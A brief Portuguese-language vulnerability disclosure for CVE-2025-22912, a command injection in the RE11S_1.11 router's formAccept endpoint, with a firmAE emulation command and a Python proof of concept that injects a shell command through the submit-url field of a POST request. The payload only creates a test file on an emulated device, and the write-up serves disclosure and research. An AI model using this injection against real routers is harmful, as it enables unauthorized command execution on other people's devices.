
CVE-2025-22912
Durante meu estágio no Qi An Xin Tiangong Lab, descobri uma vulnerabilidade de injeção de comando no roteador RE11S_1.11.
Ao analisar o arquivo webs no diretório bin, descobri que a função formAccept contém uma vulnerabilidade de injeção de comando.
A injeção de comando pode ser acionada pelo valor da chave submit-url, que leva a uma injeção de comando no sistema.

Use o seguinte comando para simular com firmAE.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
O conteúdo do arquivo poc.py é o seguinte:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

Pode-se observar que um arquivo /tmp/xyq é adicionado após a execução, o que prova que o ataque foi bem-sucedido.